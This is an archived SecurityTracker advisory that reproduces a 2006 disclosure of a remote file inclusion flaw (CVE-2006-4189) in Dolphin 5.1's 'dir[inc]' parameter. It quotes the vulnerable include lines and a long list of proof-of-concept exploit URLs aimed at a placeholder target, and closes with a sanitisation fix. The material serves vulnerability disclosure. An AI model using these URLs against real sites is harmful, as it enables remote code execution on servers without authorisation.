SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  Dolphin Vendors:  BoonEx
Dolphin Include File Bug in 'dir[inc]' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016692
SecurityTracker URL:  http://securitytracker.com/id?1016692
CVE Reference:  CVE-2006-4189   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 14 2006
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.1
Description:  Charles Nelwan (Cmaster4) reported a vulnerability in Dolphin. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'dir[inc]' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A large number of scripts in the package are affected.
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.boonex.com/products/dolphin/ (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Charles Nelwan" <cnelwan@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Sun, 13 Aug 2006 14:56:24 -0600
From:  "Charles Nelwan" <cnelwan@gmail.com>
Subject:  Dolphin Web Community Software v5.1 &lt;== dir[inc] Remote File Include Vulnerabilities

 
-------------------------------------------------------------------------------------------------
Dolphin Web Community Software v5.1 Remote File Include Vulnerabilities
-------------------------------------------------------------------------------------------------
Author        : Charles Nelwan a.k.a Cmaster4
Community : #batamhacker irc.dal.net
Date           : 2006/08/14
HomePage  : http://www.batamhacker.info
Contact      : bugtraq_indo[at]yahoo[dot]com
-------------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Dolphin Web Community Software
Vendor      : http://www.boonex.com
Class       : Remote File
Inclusion
Risk        : High
Summary     : 2006 BoonEx Group
 
------------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
in
index.php, aemodule.php, browse.php, cc.php, click.php, faq.php, gallery.php , im.php 
inbox.php, join_form.php, logout.php, messages_inbox.php, news_view.php, poll.php, 
profile.php, profile_edit.php, profile_video, sdating.php, service.php, stories.php
   tellfriend.php, video_pop.php, about_us.php, affiliates.php, cart.php, change_status.php
   compose.php, forgot.php, getmem.php, links.php, member.php, messages_outbox.php, outbox.php
   polls.php, profile_activate.php, profile_photos.php, rate.php, search.php , shoutbox.php
   story.php, terms_of_use.php, vkiss.php, activation_email.php, blog.php, cart_pop.php,
   checkout.php, contact.php, explanation.php, freemail.php, guestbook.php, imctrl.php
   join_aff.php, list_pop.php, membership.php, news.php, photos_gallery.php, privacy.php
   profile_customize.php, profile_sound.php, result.php, search_result.php, sound_pop.php
   story_view.php, unregister.php
 
and i found all of the directory/script have the bugs/vulnerability
 
Vulnerability Script
----------------------------------------index.php------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}admin.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}prof.inc.php" );
require_once( "{$dir['inc']}members.inc.php" );
require_once( "{$dir['inc']}quotes.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
require_once( "{$dir['inc']}membership_levels.inc.php" );
----------------------------------------aemodule.php---------------------------------------------
require_once("./inc/header.inc.php");
require_once("{$dir['inc']}db.inc.php");
require_once("{$dir['inc']}design.inc.php");
require_once("{$dir['inc']}admin.inc.php");
require_once("{$dir['inc']}modules.inc.php");
require_once("{$dir['inc']}membership_levels.inc.php");
require_once("{$dir['inc']}utils.inc.php");
--------------------------------------browse.php------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
----------------------------------------cc.php--------------------------------------------------
require_once("inc/header.inc.php");
require_once("{$dir['inc']}db.inc.php");
require_once("{$dir['inc']}design.inc.php");
require_once("{$dir['inc']}profiles.inc.php");
require_once("{$dir['inc']}utils.inc.php");
---------------------------------------click.php-------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
-------------------------------------------faq.php------------------------------------------------
require_once( "./inc/header.inc.php" );
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]design.inc.php" );
require_once( "$dir[inc]profiles.inc.php" );
-------------------------------------------gallery.php--------------------------------------------
require_once("inc/header.inc.php");
require_once("{$dir['inc']}db.inc.php");
require_once("{$dir['inc']}admin.inc.php");
require_once("{$dir['inc']}design.inc.php");
require_once("{$dir['inc']}modules.inc.php");
require_once("{$dir['inc']}utils.inc.php");
require_once("{$dir['inc']}images.inc.php");
-------------------------------------------im.php----------------------------------------------------
--
require_once( "./inc/header.inc.php" );
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]design.inc.php" );
require_once( "$dir[inc]profiles.inc.php" );
-------------------------------------------inbox.php-------------------------------------------------

require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
-------------------------------------------join_form.php--------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}profile_disp.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
 
-------------------------------------------logout.php--------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
-------------------------------------------messages_inbox.php----------------------------------------
----
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
 
And more of Vulnerability, i'm sorry i can not show all off script coz to many bugs
-----------------------------------------------------------------------------------------------------
-------
 
PoC:
~~~
http://www.target.com/index.php?dir[inc]=
http://www.target.com/event.php?dir[inc]=[Evil Script]
http://www.target.com/aemodule.php?dir[inc]=[Evil Script]
http://www.target.com/browse.php?dir[inc]=[Evil Script]
http://www.target.com/cc.php?dir[inc]=[Evil Script]
http://www.target.com/click.php?dir[inc]=[Evil Script]
http://www.target.com/faq.php?dir[inc]=[Evil Script]
http://www.target.com/gallery.php?dir[inc]=[Evil Script]
http://www.target.com/im.php?dir[inc]=[Evil Script]
http://www.target.com/inbox.php?dir[inc]=[Evil Script]
http://www.target.com/join_form.php?dir[inc]=[Evil Script]
http://www.target.com/logout.php?dir[inc]=[Evil Script]
http://www.target.com/messages_inbox.php?dir[inc]=[Evil Script]
http://www.target.com/news_view.php?dir[inc]=[Evil Script]
http://www.target.com/poll.php?dir[inc]=[Evil Script]
http://www.target.com/profile.php?dir[inc]=[Evil Script]
http://www.target.com/profile_edit.php?dir[inc]=[Evil Script]
http://www.target.com/profile_video?dir[inc]=[Evil Script]
http://www.target.com/sdating.php?dir[inc]=[Evil Script]
http://www.target.com/service.php?dir[inc]=[Evil Script]
http://www.target.com/stories.php?dir[inc]=[Evil Script]
http://www.target.com/tellfriend.php?dir[inc]=[Evil Script]
http://www.target.com/video_pop.php?dir[inc]=[Evil Script]
http://www.target.com/about_us.php?dir[inc]=[Evil Script]
http://www.target.com/affiliates.php?dir[inc]=[Evil Script]
http://www.target.com/cart.php?dir[inc]=[Evil Script]
http://www.target.com/change_status.php?dir[inc]=[Evil Script]
http://www.target.com/compose.php?dir[inc]=[Evil Script]
http://www.target.com/forgot.php?dir[inc]=[Evil Script]
http://www.target.com/getmem.php?dir[inc]=[Evil Script]
http://www.target.com/member.php?dir[inc]=[Evil Script]
http://www.target.com/messages_outbox.php?dir[inc]=[Evil Script]
http://www.target.com/outbox.php?dir[inc]=[Evil Script]
http://www.target.com/polls.php?dir[inc]=[Evil Script]
http://www.target.com/profile_activate.php?dir[inc]=[Evil Script]
http://www.target.com/profile_photos.php?dir[inc]=[Evil Script]
http://www.target.com/rate.php?dir[inc]=[Evil Script]
http://www.target.com/search.ph?dir[inc]=[Evil Script]
http://www.target.com/shoutbox.php?dir[inc]=[Evil Script]
http://www.target.com/story.php?dir[inc]=[Evil Script]
http://www.target.com/terms_of_use.php?dir[inc]=[Evil Script]
http://www.target.com/vkiss.php?dir[inc]=[Evil Script]
http://www.target.com/activation_email.php?dir[inc]=[Evil Script]
http://www.target.com/blog.php?dir[inc]=[Evil Script]
http://www.target.com/cart_pop.php?dir[inc]=[Evil Script]
http://www.target.com/checkout.php?dir[inc]=[Evil Script]
http://www.target.com/contact.php?dir[inc]=[Evil Script]
http://www.target.com/explanation.php?dir[inc]=[Evil Script]
http://www.target.com/freemail.ph?dir[inc]=[Evil Script]
http://www.target.com/guestbook.php?dir[inc]=[Evil Script]
http://www.target.com/imctrl.php?dir[inc]=[Evil Script]
http://www.target.com/join_aff.php?dir[inc]=[Evil Script]
http://www.target.com/list_pop.php?dir[inc]=[Evil Script]
http://www.target.com/membership.php?dir[inc]=[Evil Script]
http://www.target.com/news.php?dir[inc]=[Evil Script]
http://www.target.com/photos_gallery.php?dir[inc]=[Evil Script]
http://www.target.com/privacy.php?dir[inc]=[Evil Script]
http://www.target.com/profile_customize.php?dir[inc]=[Evil Script]
http://www.target.com/profile_sound.php?dir[inc]=[Evil Script]
http://www.target.com/result.php?dir[inc]=[Evil Script]
http://www.target.com/search_result.php?dir[inc]=[Evil Script]
http://www.target.com/sound_pop.php?dir[inc]=[Evil Script]
http://www.target.com/story_view.php?dir[inc]=[Evil Script]
http://www.target.com/unregister.php?dir[inc]=[Evil Script]
 
Solution:
~~~~~~~~
Sanitize Variabel $$dir['inc']
in index.php, aemodule.php, browse.php, cc.php, click.php, faq.php, gallery.php, im.php
   inbox.php, join_form.php, logout.php, messages_inbox.php, news_view.php, poll.php,
   profile.php, profile_edit.php, profile_video, sdating.php, service.php, stories.php
   tellfriend.php, video_pop.php, about_us.php, affiliates.php, cart.php, change_status.php
   compose.php, forgot.php , getmem.php, links.php, member.php, messages_outbox.php, outbox.php
   polls.php, profile_activate.php, profile_photos.php, rate.php, search.php, shoutbox.php
   story.php, terms_of_use.php, vkiss.php, activation_email.php, blog.php, cart_pop.php,
   checkout.php, contact.php, explanation.php, freemail.php, guestbook.php, imctrl.php
   join_aff.php, list_pop.ph, pmembership.php, news.php, photos_gallery.php, privacy.php
   profile_customize.php, profile_sound.php, result.php, search_result.php, sound_pop.php
   story_view.php, unregister.php
 
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC